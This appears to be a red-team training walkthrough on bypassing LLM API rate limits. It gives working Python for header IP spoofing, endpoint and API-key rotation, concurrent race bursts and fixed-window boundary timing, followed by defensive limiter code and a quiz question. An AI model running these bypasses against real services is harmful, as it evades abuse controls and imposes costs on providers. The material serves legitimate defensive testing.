API Rate Limit Bypass
Techniques to bypass API rate limiting on LLM services, including header manipulation, distributed requests, authentication rotation, and endpoint discovery.
LLM API services implement rate limiting to prevent abuse, control costs, and ensure fair access. However, rate limiting implementations vary in sophistication, and many common configurations have exploitable weaknesses. Understanding these weaknesses is essential for both red teams (testing defenses) and blue teams (building robust limits). This walkthrough covers rate limit fingerprinting, bypass techniques, and defensive recommendations.
Step 1: Fingerprinting Rate Limit Implementation
Before attempting bypasses, identify how rate limiting is implemented by analyzing response headers and behavior.
"""
Fingerprint rate limiting implementation by analyzing
response headers and timing patterns.
"""
import requests
import time
from dataclasses import dataclass
from typing import Optional
@dataclass
class RateLimitFingerprint:
    """Structured description of how an endpoint appears to rate limit callers."""

    # Algorithm family: "token-bucket", "sliding-window", or "fixed-window".
    limit_type: str
    # Request quota, or None when it is not known.
    limit_value: Optional[int]
    # Length of the limiting window in seconds, or None when it is not known.
    window_seconds: Optional[int]
    # Identity the limiter keys on: "ip", "api-key", "user-id", or "combination".
    tracked_by: str
    # Names of the rate-limit response headers associated with this fingerprint.
    headers_used: list[str]
    # Free-form note on reset behavior.
    reset_behavior: str
# Response headers that commonly advertise rate-limit state. Built once at
# import time instead of on every probe iteration.
_RATE_LIMIT_HEADERS = (
    "X-RateLimit-Limit",
    "X-RateLimit-Remaining",
    "X-RateLimit-Reset",
    "Retry-After",
    "RateLimit-Limit",
    "RateLimit-Remaining",
    "RateLimit-Reset",
    "X-Rate-Limit-Limit",
    "X-Rate-Limit-Remaining",
)

# Spellings of the "remaining quota" header, in the order they are consulted
# for the progress line.
_REMAINING_HEADERS = (
    "X-RateLimit-Remaining",
    "RateLimit-Remaining",
    "X-Rate-Limit-Remaining",
)


def fingerprint_rate_limiter(
    url: str,
    headers: dict,
    num_requests: int = 20,
    delay: float = 0.1,
) -> dict:
    """Probe an API endpoint to fingerprint its rate limiting.

    Sends up to ``num_requests`` GET requests, recording status, latency and
    any rate-limit headers for each. Probing stops at the first HTTP 429.

    Args:
        url: Endpoint to probe.
        headers: Request headers sent with every probe.
        num_requests: Maximum number of probes.
        delay: Seconds to pause between consecutive probes.

    Returns:
        ``{"results": [...], "analysis": {...}}`` where ``results`` holds one
        dict per probe (or an ``error`` entry when the request failed) and
        ``analysis`` is the output of ``analyze_fingerprint``.
    """
    results = []
    for i in range(num_requests):
        # perf_counter is monotonic, so latency is not distorted by
        # wall-clock adjustments during the run.
        start = time.perf_counter()
        try:
            resp = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as e:
            results.append({"request_num": i + 1, "error": str(e)})
        else:
            elapsed = time.perf_counter() - start

            # Keep only the rate-limit headers that are present and non-empty.
            observed = {}
            for header in _RATE_LIMIT_HEADERS:
                value = resp.headers.get(header)
                if value:
                    observed[header] = value

            results.append({
                "request_num": i + 1,
                "status_code": resp.status_code,
                "elapsed_ms": round(elapsed * 1000, 1),
                "rate_limit_headers": observed,
            })

            if resp.status_code == 429:
                retry_after = resp.headers.get("Retry-After", "unknown")
                print(f" Request {i+1}: RATE LIMITED (retry after: {retry_after})")
                break

            # Report the remaining quota whichever header spelling is in use.
            remaining = next(
                (observed[name] for name in _REMAINING_HEADERS if name in observed),
                "?",
            )
            print(f" Request {i+1}: {resp.status_code} (remaining: {remaining})")

        # No point pausing after the final probe.
        if i < num_requests - 1:
            time.sleep(delay)

    # Analyze results
    analysis = analyze_fingerprint(results)
    return {"results": results, "analysis": analysis}
def _parse_limit_value(raw):
    """Return the leading integer of a limit header value, or None if absent/unparsable."""
    if not raw:
        return None
    # Values may carry extra policy items, e.g. "100, 100;w=60" or "100;w=60";
    # only the first item is the quota.
    head = str(raw).split(",")[0].split(";")[0].strip()
    try:
        return int(head)
    except ValueError:
        return None


def analyze_fingerprint(results: list[dict]) -> dict:
    """Analyze probing results to determine rate limit configuration.

    Args:
        results: Per-request dicts as produced by the prober. Entries may lack
            ``rate_limit_headers`` / ``status_code`` (e.g. error entries).

    Returns:
        A dict with:
          * ``headers_detected`` - sorted names of all rate-limit headers seen
          * ``limit_value`` - first parsable quota from any limit header, else None
          * ``limited_at_request`` - ``request_num`` of the first 429, else None
          * ``uses_retry_after`` - whether any response carried ``Retry-After``
    """
    # All spellings of the quota header that the prober records.
    limit_header_names = ("X-RateLimit-Limit", "RateLimit-Limit", "X-Rate-Limit-Limit")

    headers_seen = set()
    limit_value = None
    limited_at = None

    for r in results:
        rl_headers = r.get("rate_limit_headers", {})
        headers_seen.update(rl_headers)

        if limit_value is None:
            for name in limit_header_names:
                parsed = _parse_limit_value(rl_headers.get(name))
                if parsed is not None:
                    limit_value = parsed
                    break

        if limited_at is None and r.get("status_code") == 429:
            limited_at = r["request_num"]

    return {
        # Sorted so the report is stable from run to run.
        "headers_detected": sorted(headers_seen),
        "limit_value": limit_value,
        "limited_at_request": limited_at,
        "uses_retry_after": "Retry-After" in headers_seen,
    }
print("Rate limit fingerprinting ready")
print("Call fingerprint_rate_limiter() with your target endpoint")
Step 2: Header-Based Bypass Techniques
Many rate limiters track clients by IP address, which can be spoofed through HTTP headers when the application trusts proxy headers.
"""
Techniques for bypassing IP-based rate limiting through
HTTP header manipulation.
"""
import requests
import random
from typing import Generator
def generate_random_ip() -> str:
    """Return a random dotted-quad IPv4 string.

    The first octet is drawn from 1-223, the two middle octets from 0-255 and
    the last octet from 1-254. No other filtering is applied.
    """
    first = random.randint(1, 223)
    second = random.randint(0, 255)
    third = random.randint(0, 255)
    last = random.randint(1, 254)
    return ".".join(str(octet) for octet in (first, second, third, last))
def header_bypass_techniques() -> list[dict]:
    """Build the catalogue of client-IP header variants to try.

    Each entry is a dict with ``name``, ``headers`` (the header(s) to add to a
    request) and ``description``. All single-header entries share one randomly
    generated address; the final entry sends a three-address
    ``X-Forwarded-For`` chain whose first hop is that same address.
    """
    spoofed_ip = generate_random_ip()

    # (technique name, header name, description) for the single-header variants.
    single_header_rows = (
        ("x_forwarded_for", "X-Forwarded-For",
         "Most common proxy header, trusted by many load balancers"),
        ("x_real_ip", "X-Real-IP",
         "Nginx-specific client IP header"),
        ("x_originating_ip", "X-Originating-IP",
         "Microsoft/Exchange client IP header"),
        ("x_client_ip", "X-Client-IP",
         "Generic client IP header used by some proxies"),
        ("cf_connecting_ip", "CF-Connecting-IP",
         "Cloudflare-specific header (effective if behind CF)"),
        ("true_client_ip", "True-Client-IP",
         "Akamai CDN client IP header"),
    )
    catalogue = [
        {"name": label, "headers": {header_name: spoofed_ip}, "description": blurb}
        for label, header_name, blurb in single_header_rows
    ]

    # The chain variant needs two additional hops after the shared address.
    second_hop = generate_random_ip()
    third_hop = generate_random_ip()
    catalogue.append({
        "name": "x_forwarded_for_chain",
        "headers": {"X-Forwarded-For": f"{spoofed_ip}, {second_hop}, {third_hop}"},
        "description": "Multi-hop proxy chain (some parsers take the first IP)",
    })
    return catalogue
def test_header_bypass(
    url: str,
    base_headers: dict,
    requests_per_technique: int = 5,
) -> list[dict]:
    """Test each header technique against the target and summarize the outcome.

    For every technique, ``requests_per_technique`` GET requests are sent with
    a freshly generated address in that technique's header(s). A request
    counts as a success when it completes with any status other than 429.

    Args:
        url: Endpoint under test.
        base_headers: Headers sent with every request (e.g. authentication).
        requests_per_technique: Number of requests per technique; ``0`` yields
            a ``success_rate`` of 0.0 and ``effective`` False for every entry.

    Returns:
        One dict per technique with ``technique``, ``description``,
        ``success_rate`` (0.0-1.0) and ``effective`` (True only when every
        request succeeded).
    """
    results = []
    for technique in header_bypass_techniques():
        successes = 0
        for _ in range(requests_per_technique):
            # Rotate the address on every request for whichever header this
            # technique uses, keeping the number of comma-separated hops so
            # the multi-hop chain variant is still sent as a chain.
            rotated = {
                name: ", ".join(generate_random_ip() for _hop in value.split(","))
                for name, value in technique["headers"].items()
            }
            headers = {**base_headers, **rotated}
            try:
                resp = requests.get(url, headers=headers, timeout=10)
            except requests.exceptions.RequestException:
                # A failed request simply does not count as a success.
                continue
            if resp.status_code != 429:
                successes += 1

        # Guard the ratio so a zero-request run does not divide by zero.
        attempted = requests_per_technique > 0
        effective = attempted and successes == requests_per_technique
        results.append({
            "technique": technique["name"],
            "description": technique["description"],
            "success_rate": successes / requests_per_technique if attempted else 0.0,
            "effective": effective,
        })
        status = "EFFECTIVE" if effective else "BLOCKED"
        print(f" {technique['name']}: {status} ({successes}/{requests_per_technique})")
    return results
print("Header bypass techniques ready")
Step 3: Distributed Rate Limit Bypass
"""
Techniques for distributing requests to stay under rate limits
or exploit inconsistencies in distributed rate limiting.
"""
import asyncio
import aiohttp
import time
from dataclasses import dataclass
@dataclass
class DistributedBypassResult:
    """Outcome counters for one distributed-request experiment."""

    # Identifier of the technique that produced this result.
    technique: str
    # Number of requests in the run.
    total_requests: int
    # Responses with any status other than 429.
    successful: int
    # Responses with status 429.
    rate_limited: int
    # Successful responses per second of elapsed time.
    effective_rps: float
async def endpoint_rotation_bypass(
endpoints: list[str],
headers: dict,
total_requests: int = 50,
) -> DistributedBypassResult:
"""Rotate across multiple API endpoints that share the same backend.
If rate limits are per-endpoint rather than per-user, distributing
requests across endpoints multiplies the effective limit.
"""
successful = 0
limited = 0
start = time.time()
async with aiohttp.ClientSession(headers=headers) as session:
for i in range(total_requests):
endpoint = endpoints[i % len(endpoints)]
try:
async with session.get(endpoint, timeout=aiohttp.ClientTimeout(total=10)) as resp:
if resp.status == 429:
limited += 1
else:
successful += 1
except Exception:
pass
elapsed = time.time() - start
return DistributedBypassResult(
technique="endpoint_rotation",
total_requests=total_requests,
successful=successful,
rate_limited=limited,
effective_rps=round(successful / elapsed, 1),
)
async def concurrent_burst_bypass(
    url: str,
    headers: dict,
    burst_size: int = 20,
) -> DistributedBypassResult:
    """Issue ``burst_size`` requests concurrently and count the outcomes.

    The requests are started together so they arrive before a non-atomic
    limiter can update its counter; more successes than the configured limit
    indicates such a race.

    Args:
        url: Endpoint under test.
        headers: Default headers for the shared client session.
        burst_size: Number of concurrent requests.

    Returns:
        A ``DistributedBypassResult`` with success / 429 counts. Requests that
        failed or were cancelled are counted as neither.
    """
    successful = 0
    limited = 0
    request_timeout = aiohttp.ClientTimeout(total=10)
    start = time.perf_counter()

    async with aiohttp.ClientSession(headers=headers) as session:
        pending = [
            session.get(url, timeout=request_timeout)
            for _ in range(burst_size)
        ]
        responses = await asyncio.gather(*pending, return_exceptions=True)

        for resp in responses:
            # With return_exceptions=True a slot can hold any BaseException
            # (e.g. CancelledError), not only Exception subclasses.
            if isinstance(resp, BaseException):
                continue
            try:
                if resp.status == 429:
                    limited += 1
                else:
                    successful += 1
            finally:
                # Always hand the connection back, even if counting fails.
                resp.close()

    elapsed = time.perf_counter() - start
    return DistributedBypassResult(
        technique="concurrent_burst",
        total_requests=burst_size,
        successful=successful,
        rate_limited=limited,
        effective_rps=round(successful / elapsed, 1) if elapsed > 0 else 0,
    )
print("Distributed bypass techniques ready")
Step 4: Authentication Rotation
"""
Bypass per-key rate limits by rotating API keys or tokens.
"""
from dataclasses import dataclass
from typing import Optional
import time
import requests
@dataclass
class AuthRotationResult:
    """Summary of one key-rotation test run."""

    # Size of the key pool that was rotated through.
    keys_used: int
    # Requests that produced a response (successful + rate_limited).
    total_requests: int
    # Responses with any status other than 429.
    successful: int
    # Responses with status 429.
    rate_limited: int
    # Successful requests divided by the highest per-key usage count.
    effective_multiplier: float
class APIKeyRotator:
    """Round-robin over a pool of API keys, skipping keys that returned 429.

    Attributes:
        keys: The key pool, in rotation order.
        current_idx: Index of the next key to consider.
        key_usage: Number of requests attempted with each key.
        key_limited: Whether each key has been answered with HTTP 429.
    """

    def __init__(self, api_keys: list[str]):
        self.keys = api_keys
        self.current_idx = 0
        self.key_usage = dict.fromkeys(api_keys, 0)
        self.key_limited = dict.fromkeys(api_keys, False)

    def _has_available_key(self) -> bool:
        """Return True while at least one key has not been marked limited."""
        return any(not self.key_limited.get(key, False) for key in self.keys)

    def get_next_key(self) -> Optional[str]:
        """Return the next key not marked limited, or None if every key is."""
        # At most one full lap around the pool.
        for _ in range(len(self.keys)):
            key = self.keys[self.current_idx]
            self.current_idx = (self.current_idx + 1) % len(self.keys)
            if not self.key_limited.get(key, False):
                return key
        return None  # All keys exhausted

    def mark_limited(self, key: str) -> None:
        """Mark a key as rate limited so rotation skips it."""
        self.key_limited[key] = True

    def send_request(
        self,
        url: str,
        base_headers: dict,
        key_header: str = "Authorization",
        key_prefix: str = "Bearer ",
    ) -> "Optional[requests.Response]":
        """Send one GET using the next available key.

        Args:
            url: Endpoint to request.
            base_headers: Headers sent in addition to the key header.
            key_header: Name of the header that carries the key.
            key_prefix: Text placed before the key in that header.

        Returns:
            The response, or None when no key is available or the request
            failed at the transport level. A 429 response marks the key
            as limited before it is returned.
        """
        key = self.get_next_key()
        if key is None:
            return None

        headers = {**base_headers, key_header: f"{key_prefix}{key}"}
        # .get() tolerates keys appended to self.keys after construction.
        self.key_usage[key] = self.key_usage.get(key, 0) + 1
        try:
            resp = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException:
            return None
        if resp.status_code == 429:
            self.mark_limited(key)
        return resp

    def run_rotation_test(
        self,
        url: str,
        base_headers: dict,
        total_requests: int = 100,
    ) -> "AuthRotationResult":
        """Send up to ``total_requests`` rotated requests and summarize them.

        The run ends early once every key has been marked limited. A
        transport-level failure skips that attempt instead of ending the run.

        Returns:
            An ``AuthRotationResult``; ``effective_multiplier`` is the number
            of successful requests divided by the highest per-key usage.
        """
        successful = 0
        limited = 0
        for _ in range(total_requests):
            resp = self.send_request(url, base_headers)
            if resp is None:
                # None means either "pool exhausted" or "this request failed".
                # Only the former should stop the run.
                if not self._has_available_key():
                    break
                continue
            if resp.status_code == 429:
                limited += 1
            else:
                successful += 1

        single_key_limit = max(self.key_usage.values()) if self.key_usage else 0
        return AuthRotationResult(
            keys_used=len(self.keys),
            total_requests=successful + limited,
            successful=successful,
            rate_limited=limited,
            effective_multiplier=round(
                successful / max(single_key_limit, 1), 1
            ),
        )
print("API key rotation framework ready")
Step 5: Window Boundary Exploitation
"""
Exploit the reset boundary of fixed-window rate limiters.
"""
import time
import requests
from dataclasses import dataclass
@dataclass
class WindowExploitResult:
    """Outcome of a window-boundary timing test."""

    # Identifier of the technique that produced this result.
    technique: str
    # Number of requests accepted across the boundary.
    requests_in_window: int
    # The limit the caller expected per window.
    normal_limit: int
    # Number of requests that were actually accepted.
    effective_limit: int
def _parse_reset_epoch(raw) -> "int | None":
    """Return a reset header value as whole seconds, or None if absent/unparsable."""
    if not raw:
        return None
    try:
        # float() first so fractional values such as "1700000000.5" are accepted.
        return int(float(raw))
    except (TypeError, ValueError):
        return None


def _count_unthrottled(url: str, headers: dict, attempts: int) -> int:
    """Send up to ``attempts`` GETs; return how many were not answered with 429."""
    accepted = 0
    for _ in range(attempts):
        try:
            r = requests.get(url, headers=headers, timeout=5)
        except requests.exceptions.RequestException:
            # Stop the burst on the first transport failure.
            break
        if r.status_code != 429:
            accepted += 1
    return accepted


def exploit_fixed_window(
    url: str,
    headers: dict,
    window_seconds: int = 60,
    limit: int = 100,
) -> WindowExploitResult:
    """Measure how many requests a limiter accepts across a window reset.

    Fixed-window limiters reset their counter at fixed intervals, so a burst
    just before the reset plus a burst just after can together exceed the
    per-window limit.

    Args:
        url: Endpoint under test.
        headers: Headers sent with every request.
        window_seconds: Expected window length; reset times further away than
            this are ignored.
        limit: Number of requests attempted in each of the two bursts.

    Returns:
        A ``WindowExploitResult`` whose ``requests_in_window`` and
        ``effective_limit`` both hold the total accepted across both bursts.
    """
    # Step 1: Find the window reset time from headers. The value is compared
    # against the current epoch time; a missing or non-numeric header simply
    # skips the alignment wait instead of raising.
    resp = requests.get(url, headers=headers, timeout=10)
    reset_ts = _parse_reset_epoch(resp.headers.get("X-RateLimit-Reset"))
    if reset_ts is not None:
        wait_seconds = reset_ts - int(time.time())
        if 0 < wait_seconds < window_seconds:
            print(f"Window resets in {wait_seconds} seconds")
            # Wait until just before reset
            if wait_seconds > 2:
                print(f"Waiting {wait_seconds - 1} seconds...")
                time.sleep(wait_seconds - 1)

    # Step 2: Send bursts straddling the window boundary.
    pre_window = _count_unthrottled(url, headers, limit)
    # Brief pause for window to reset
    time.sleep(1.5)
    post_window = _count_unthrottled(url, headers, limit)

    total_success = pre_window + post_window
    return WindowExploitResult(
        technique="fixed_window_boundary",
        requests_in_window=total_success,
        normal_limit=limit,
        effective_limit=total_success,
    )
print("Window boundary exploitation ready")
Step 6: LLM-Specific Rate Limit Bypasses
"""
LLM-specific rate limit bypass techniques that exploit
how token-based billing and rate limiting work.
"""
from dataclasses import dataclass
@dataclass
class LLMRateLimitBypass:
    """Catalogue entry describing one LLM-specific rate-limit weakness."""

    # Short snake_case identifier.
    name: str
    # One-sentence explanation of the idea.
    description: str
    # The kind of limit the technique is aimed at.
    target: str
    # Qualitative rating with a short justification.
    effectiveness: str
# Catalogue of LLM-specific techniques. Each row is
# (name, description, target, effectiveness).
LLM_BYPASS_TECHNIQUES = [
    LLMRateLimitBypass(
        name=row_name,
        description=row_description,
        target=row_target,
        effectiveness=row_effectiveness,
    )
    for row_name, row_description, row_target, row_effectiveness in (
        (
            "model_parameter_variation",
            "Different model parameters (temperature, max_tokens) may be tracked separately",
            "Per-model or per-configuration rate limits",
            "Low - most APIs track by key, not parameters",
        ),
        (
            "streaming_vs_blocking",
            "Streaming responses may count differently than blocking responses",
            "Token-based rate limits",
            "Medium - some implementations count tokens differently for streamed responses",
        ),
        (
            "batch_api_abuse",
            "Batch APIs may have separate or higher rate limits than real-time APIs",
            "Separate batch endpoint rate limits",
            "Medium - batching can multiply effective throughput",
        ),
        (
            "model_version_switching",
            "Switch between model versions (gpt-4o vs gpt-4o-mini) if limits are per-model",
            "Per-model rate limits",
            "Medium - many APIs have per-model limits",
        ),
        (
            "organization_rotation",
            "Create multiple organizations/projects with separate billing",
            "Per-organization rate limits",
            "High - but requires multiple accounts",
        ),
    )
]
for technique in LLM_BYPASS_TECHNIQUES:
print(f"{technique.name}: [{technique.effectiveness}]")
print(f" {technique.description}")
print()
Step 7: Automated Rate Limit Testing
"""
Automated framework for comprehensive rate limit testing.
"""
import json
import time
import requests
from pathlib import Path
from dataclasses import dataclass, asdict
@dataclass
class RateLimitTestResult:
    """Record of one rate-limit test against a target URL."""

    # Identifier of the technique that was exercised.
    technique: str
    # URL the requests were sent to.
    target_url: str
    # Requests that produced a response.
    requests_sent: int
    # Responses with any status other than 429.
    requests_succeeded: int
    # Responses with status 429.
    requests_rate_limited: int
    # Whether the technique was judged to have evaded the limit.
    bypass_effective: bool
    # Human-readable summary line.
    notes: str
class RateLimitTester:
    """Run a small battery of rate-limit checks against one URL and report on them.

    Args:
        target_url: Endpoint under test.
        auth_headers: Headers sent with every request.
        probe_count: Maximum number of requests per test (default 50).
        pause_seconds: Pause between consecutive requests (default 0.05).
    """

    def __init__(
        self,
        target_url: str,
        auth_headers: dict,
        probe_count: int = 50,
        pause_seconds: float = 0.05,
    ):
        self.target_url = target_url
        self.auth_headers = auth_headers
        self.probe_count = probe_count
        self.pause_seconds = pause_seconds
        self.results: "list[RateLimitTestResult]" = []

    def test_all_techniques(self) -> "list[RateLimitTestResult]":
        """Run the baseline and header tests, in that order, and return all results."""
        print("Rate Limit Testing Campaign")
        print("=" * 50)

        # Test 1: Baseline (no bypass). Must run first: the header test uses
        # it to decide whether its own outcome means anything.
        self.results.append(self._test_baseline())

        # Test 2: Header manipulation
        self.results.append(self._test_headers())

        return self.results

    def _test_baseline(self) -> "RateLimitTestResult":
        """Send plain requests until the first 429 (or the probe budget runs out)."""
        print("\nTest: Baseline rate limit")
        succeeded = 0
        limited = 0

        for i in range(self.probe_count):
            try:
                resp = requests.get(self.target_url, headers=self.auth_headers, timeout=10)
            except requests.exceptions.RequestException:
                break
            if resp.status_code == 429:
                limited = 1
                print(f" Rate limited at request {i+1}")
                break
            succeeded += 1
            time.sleep(self.pause_seconds)

        # Only claim a limit was hit when one actually was.
        if limited:
            notes = f"Baseline: limited after {succeeded} requests"
        else:
            notes = f"Baseline: no rate limiting observed in {succeeded} requests"

        return RateLimitTestResult(
            technique="baseline",
            target_url=self.target_url,
            requests_sent=succeeded + limited,
            requests_succeeded=succeeded,
            requests_rate_limited=limited,
            bypass_effective=False,
            notes=notes,
        )

    def _test_headers(self) -> "RateLimitTestResult":
        """Repeat the probe with a different random X-Forwarded-For on each request.

        The result is flagged effective only when at least one request
        succeeded, none was rate limited, and - if a baseline result is
        available - the baseline did hit the limit. Without that last
        condition an endpoint that never limits anything would look bypassed.
        """
        import random  # local: not part of this section's top-level imports

        print("\nTest: X-Forwarded-For header rotation")
        succeeded = 0
        limited = 0

        for _ in range(self.probe_count):
            fake_ip = f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"
            headers = {**self.auth_headers, "X-Forwarded-For": fake_ip}
            try:
                resp = requests.get(self.target_url, headers=headers, timeout=10)
            except requests.exceptions.RequestException:
                break
            if resp.status_code == 429:
                limited += 1
            else:
                succeeded += 1
            time.sleep(self.pause_seconds)

        baseline = next(
            (r for r in self.results if r.technique == "baseline"), None
        )
        baseline_never_limited = (
            baseline is not None and baseline.requests_rate_limited == 0
        )

        notes = f"XFF rotation: {succeeded} succeeded, {limited} limited"
        if baseline_never_limited:
            notes += " (inconclusive: baseline never hit a rate limit)"

        return RateLimitTestResult(
            technique="x_forwarded_for_rotation",
            target_url=self.target_url,
            requests_sent=succeeded + limited,
            requests_succeeded=succeeded,
            requests_rate_limited=limited,
            bypass_effective=(
                succeeded > 0 and limited == 0 and not baseline_never_limited
            ),
            notes=notes,
        )

    def generate_report(self, output_path: str) -> dict:
        """Write the collected results and fixed recommendations to a JSON file.

        Args:
            output_path: File to write; an existing file is overwritten.

        Returns:
            The report dict that was serialized.
        """
        report = {
            "target": self.target_url,
            "results": [asdict(r) for r in self.results],
            "recommendations": [
                "Use actual TCP connection IP, not X-Forwarded-For, for rate limiting",
                "Implement sliding window or token bucket instead of fixed window",
                "Use atomic operations for distributed rate limiting",
                "Rate limit by both IP and API key for defense in depth",
                "Add anomaly detection for burst patterns",
            ],
        }
        # Explicit encoding so the output does not depend on the platform default.
        with open(output_path, "w", encoding="utf-8") as f:
            json.dump(report, f, indent=2)
        return report
print("Rate limit testing framework ready")
Step 8: Defensive Recommendations
"""
Robust rate limiting implementation reference for LLM APIs.
"""
import time
from dataclasses import dataclass
from typing import Optional
class SlidingWindowRateLimiter:
    """A sliding window rate limiter that is resistant to boundary attacks.

    Every accepted request is timestamped; a request is allowed only while
    fewer than ``limit`` accepted requests fall within the trailing
    ``window_seconds``. Timestamps come from ``time.monotonic()`` so that
    wall-clock adjustments cannot shrink or stretch the window.

    Entries for clients with no live timestamps are evicted, roughly once per
    window, so memory does not grow without bound when client ids churn.

    Attributes:
        limit: Maximum accepted requests per window.
        window: Window length in seconds.
        requests: Per-client timestamps of accepted requests, oldest first.
    """

    def __init__(self, limit: int, window_seconds: int):
        self.limit = limit
        self.window = window_seconds
        self.requests: dict[str, list[float]] = {}
        self._last_purge = time.monotonic()

    def _live_timestamps(self, client_id: str, now: float) -> list[float]:
        """Return client_id's timestamps that are still inside the window."""
        cutoff = now - self.window
        return [t for t in self.requests.get(client_id, ()) if t > cutoff]

    def purge_expired(self, now: Optional[float] = None) -> int:
        """Drop every client whose timestamps have all expired.

        Args:
            now: Monotonic reference time; defaults to the current time.

        Returns:
            The number of client entries removed.
        """
        if now is None:
            now = time.monotonic()
        cutoff = now - self.window
        # Timestamps are appended in increasing order, so the last one is the
        # newest; if it has expired, so have all the others.
        stale = [
            client_id
            for client_id, stamps in self.requests.items()
            if not stamps or stamps[-1] <= cutoff
        ]
        for client_id in stale:
            del self.requests[client_id]
        self._last_purge = now
        return len(stale)

    def is_allowed(self, client_id: str) -> bool:
        """Record a request from client_id if it fits the limit.

        Returns:
            True if the request was accepted (and recorded), False otherwise.
        """
        now = time.monotonic()

        # Amortized cleanup: sweep idle clients at most once per window.
        if now - self._last_purge >= self.window:
            self.purge_expired(now)

        timestamps = self._live_timestamps(client_id, now)

        if len(timestamps) >= self.limit:
            if timestamps:
                self.requests[client_id] = timestamps
            else:
                # Never keep an empty entry for a rejected client.
                self.requests.pop(client_id, None)
            return False

        timestamps.append(now)
        self.requests[client_id] = timestamps
        return True

    def get_remaining(self, client_id: str) -> int:
        """Return how many more requests client_id may make right now (read-only)."""
        live = self._live_timestamps(client_id, time.monotonic())
        return max(0, self.limit - len(live))
class MultiDimensionalRateLimiter:
    """Rate limit by multiple dimensions simultaneously.

    A request must fit the per-IP, per-key, per-user and global limits. Quota
    is consumed only when the request is allowed in every dimension, so a
    caller blocked on one dimension cannot drain the global budget or the
    quota of a key or user id it merely names.

    Args:
        ip_limit: Requests per window per IP address.
        key_limit: Requests per window per API key.
        user_limit: Requests per window per user id.
        global_limit: Requests per window across all callers.
        window_seconds: Window length shared by all dimensions.
    """

    def __init__(
        self,
        ip_limit: int = 100,
        key_limit: int = 60,
        user_limit: int = 30,
        global_limit: int = 10000,
        window_seconds: int = 60,
    ):
        self.by_ip = SlidingWindowRateLimiter(limit=ip_limit, window_seconds=window_seconds)
        self.by_key = SlidingWindowRateLimiter(limit=key_limit, window_seconds=window_seconds)
        self.by_user = SlidingWindowRateLimiter(limit=user_limit, window_seconds=window_seconds)
        self.global_limiter = SlidingWindowRateLimiter(limit=global_limit, window_seconds=window_seconds)

    def check(self, ip: str, api_key: str, user_id: str) -> dict:
        """Decide whether a request is allowed and record it if so.

        Returns:
            A dict with ``allowed``, the remaining quota per dimension
            (``ip_remaining``, ``key_remaining``, ``user_remaining``) and
            ``blocked_by`` - the first exhausted dimension in the order
            ip, key, user, global, or None when the request is allowed.
        """
        # Phase 1: look without consuming. get_remaining() > 0 is exactly the
        # condition under which is_allowed() would accept the request.
        ip_ok = self.by_ip.get_remaining(ip) > 0
        key_ok = self.by_key.get_remaining(api_key) > 0
        user_ok = self.by_user.get_remaining(user_id) > 0
        global_ok = self.global_limiter.get_remaining("global") > 0

        allowed = ip_ok and key_ok and user_ok and global_ok

        # Phase 2: consume quota in every dimension only for accepted requests.
        if allowed:
            self.by_ip.is_allowed(ip)
            self.by_key.is_allowed(api_key)
            self.by_user.is_allowed(user_id)
            self.global_limiter.is_allowed("global")

        if not ip_ok:
            blocked_by = "ip"
        elif not key_ok:
            blocked_by = "key"
        elif not user_ok:
            blocked_by = "user"
        elif not global_ok:
            blocked_by = "global"
        else:
            blocked_by = None

        return {
            "allowed": allowed,
            "ip_remaining": self.by_ip.get_remaining(ip),
            "key_remaining": self.by_key.get_remaining(api_key),
            "user_remaining": self.by_user.get_remaining(user_id),
            "blocked_by": blocked_by,
        }
limiter = MultiDimensionalRateLimiter()
print("Multi-dimensional rate limiter ready")
Related Topics
- Inference Endpoint Exploitation -- Broader API security testing
- API Enumeration for LLMs -- Discovering API endpoints
- Capability Probing Methodology -- Systematic API assessment
How does the fixed-window boundary exploit achieve up to 2x the intended rate limit?